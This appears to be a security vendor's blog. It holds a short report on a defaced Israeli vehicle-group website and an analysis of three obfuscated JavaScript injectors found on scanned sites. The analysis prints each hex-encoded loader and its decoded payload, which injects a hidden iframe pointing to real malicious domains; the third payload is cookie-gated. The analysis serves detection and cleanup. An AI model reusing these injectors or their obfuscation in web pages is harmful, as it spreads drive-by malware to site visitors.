Sunday, October 27, 2013

Largest Israeli's Vehicle Group Website Was Hacked And Defaced

Quttera's experts were notified on hacked website detected via Online Website Malware Scanner. When accessed the URL it appeared to be defaced, see screenshot below. The domain belongs to Shlomo Sixt - the largest Israeli's vehicle group. From the message in the defacement we can assume that it was done by the same hackers who performed DNS attack on AVG, Avira and WhatsApp earlier this month (image is below as well).

Shlomo Sixt website hacked. Screenshot. 


Looks similar to:

AVG, AVira and WhatsApp websites hacked by pro-Palestinian hackers


We haven't found any posts in press about it. It is hard to say whether it was DNS attack like in AVG/Avira/whatsApp case or any other. No official comments by Sixt's representatives found over the internet. We can only say that it was fixed promptly, and hope that no sensitive user data was stolen.




Monday, October 21, 2013

Top 3 JavaScript Malware Threats From Last Week

Obfuscated malicious JavaScript code snippets that were detected on scanned websites

Background

Online Website Malware Scanner processes thousands of websites weekly to identify those who contain suspicious code under the legitimate web content. Detected malware is dumped and included in site scan malware report. Database of the scanned domains is publicly available and you can review malware report per each of them. For this post we selected several recent examples to be present to you because of their obfuscation and maliciousness level.

To manually review websites listing:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains

For statistics on website malware detection and severity levels:
Last day 
Last week
Last month


Sample 1 


Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the blacklisted domain that have already infected 29 other domains as per Google Safe Browsing report.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Malware details


Beautified script

  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x76,0x69,0x65,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x68,0x6d,0x70,0x63,0x62,0x6d,0x77,0x66,0x6f,0x75,0x76,0x73,0x66,0x64,0x70,0x6f,0x74,0x70,0x73,0x75,0x6a,0x76,0x6e,0x2f,0x64,0x70,0x2f,0x76,0x6c,0x30,0x60,0x64,0x70,0x6f,0x75,0x66,0x6f,0x75,0x30,0x64,0x6f,0x75,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x76,0x69,0x65,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x76,0x69,0x65,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 491 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }


Malicious payload


Decoded payload injects hidden iframe to http://globalventureconsortium.co.uk/_content/cnt.php

  1. (function () {
  2.     var uhd = document.createElement('iframe');
  3.     uhd.src = 'http://globalventureconsortium.co.uk/_content/cnt.php';
  4.     uhd.style.position = 'absolute';
  5.     uhd.style.border = '0';
  6.     uhd.style.height = '1px';
  7.     uhd.style.width = '1px';
  8.     uhd.style.left = '1px';
  9.     uhd.style.top = '1px';
  10.     if (!document.getElementById('uhd')) {
  11.         document.write('<div id=\'uhd\'></div>');
  12.         document.getElementById('uhd').appendChild(uhd);
  13.     }
  14. })();

Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic




Sample 2


Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the blacklisted domain that have already infected 10 other domains as per Google Safe Browsing report.

Malicious action


Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware details

Beautified script


  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x77,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x70,0x6d,0x76,0x6f,0x77,0x66,0x68,0x2f,0x73,0x76,0x30,0x64,0x70,0x76,0x6f,0x75,0x32,0x34,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x66,0x77,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x66,0x77,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 456 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }

Malicious payload



Decoded payload injects hidden iframe to http://colunveg.ru/count13.php


  1. (function () {
  2.     var ev = document.createElement('iframe');
  3.     ev.src = 'http://colunveg.ru/count13.php';
  4.     ev.style.position = 'absolute';
  5.     ev.style.border = '0';
  6.     ev.style.height = '1px';
  7.     ev.style.width = '1px';
  8.     ev.style.left = '1px';
  9.     ev.style.top = '1px';
  10.     if (!document.getElementById('ev')) {
  11.         document.write('<div id=\'ev\'></div>');
  12.         document.getElementById('ev').appendChild(ev);
  13.     }
  14. })();

Blacklisting status

The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic

Sample 3

Detected hidden iframe automatically injected by malicious code. Iframe downloads content from the domain that was used to download malware to visitors PC, including 1 vulnerability exploit as per Google Safe Browsing report. 
Malware payload is triggered by cookies. The method is known as "cookie-bomb attack".

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Malware details

Beautified script


  1. gznx = "s" + "p" + "li" + "t";
  2. gqveq = window;
  3. ymn = "dy";
  4. qkayz = document;
  5. gvglsm = "0x";
  6. gku = (5 - 3 - 1);
  7. try {
  8.     ++(qkayz.body)
  9. } catch (atwgx) {
  10.     fvyb = false;
  11.     try {} catch (tcwi) {
  12.         fvyb = 21;
  13.     }
  14.     if (1) {
  15.         ddi ="17:5d:6c:65:5a:6b:60:66:65:17:69:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:69:70:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:50:4d:46:45:43:3c:3d:3c:39:4d:49:3c:25:3a:46:44:26:65:64:45:4e:3e:61:2b:6d:25:67:5f:67:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:69:70:53:1e:17:5a:63:58:6a:6a:34:53:1e:69:70:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:69:70:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:69:70:27:30:1f:20:32:4:1:74:4:1:74"[gznx](":");
  16.     }
  17.     gqveq = ddi;
  18.     wuicko = [];
  19.     for (omvgs = 22 - 20 - 2; - omvgs + 1385 != 0; omvgs += 1) {
  20.         hev = omvgs;
  21.         if ((0x19 == 031)) wuicko += String["fromCharCode"](eval(gvglsm + gqveq[1 * hev]) + 0xa - gku);
  22.     }
  23.     alert(wuicko);
  24. }

Malicious payload


Decoded payload injects hidden iframe to http://YVONLEFEBVRE.COM/nmNWGj4v.php

  1. function ry09() {
  2.     var static = 'ajax';
  3.     var controller = 'index.php';
  4.     var ry = document.createElement('iframe');
  5.     ry.src = 'http://YVONLEFEBVRE.COM/nmNWGj4v.php';
  6.     ry.style.position = 'absolute';
  7.     ry.style.color = '9040';
  8.     ry.style.height = '9040px';
  9.     ry.style.width = '9040px';
  10.     ry.style.left = '10009040';
  11.     ry.style.top = '10009040';
  12.     if (!document.getElementById('ry')) {
  13.         document.write('<p id=\'ry\' class=\'ry09\' ></p>');
  14.         document.getElementById('ry').appendChild(ry);
  15.     }
  16. }
  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.     var today = new Date();
  19.     var expire = new Date();
  20.     if (nDays == null || nDays == 0) nDays = 1;
  21.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.     document.cookie = cookieName + "=" + escape(cookieValue)
  23.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }
  25. function GetCookie(name) {
  26.     var start = document.cookie.indexOf(name + "=");
  27.     var len = start + name.length + 1;
  28.     if ((!start) &&
  29.         (name != document.cookie.substring(0, name.length)))
  30.     {
  31.         return null;
  32.     }
  33.     if (start == -1) return null;
  34.     var end = document.cookie.indexOf(";", len);
  35.     if (end == -1) end = document.cookie.length;
  36.     return unescape(document.cookie.substring(len, end));
  37. }
  38. if (navigator.cookieEnabled)
  39. {
  40.     if (GetCookie('visited_uq') == 55) {} else {
  41.         SetCookie('visited_uq', '55', '1', '/');
  42.         ry09();
  43.     }
  44. }

Blacklisting status

Currently, the website is not suspicious on Google Safe Browsing. But was listed twice over the past 90 days.

Google Safe Browsing diagnostic


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.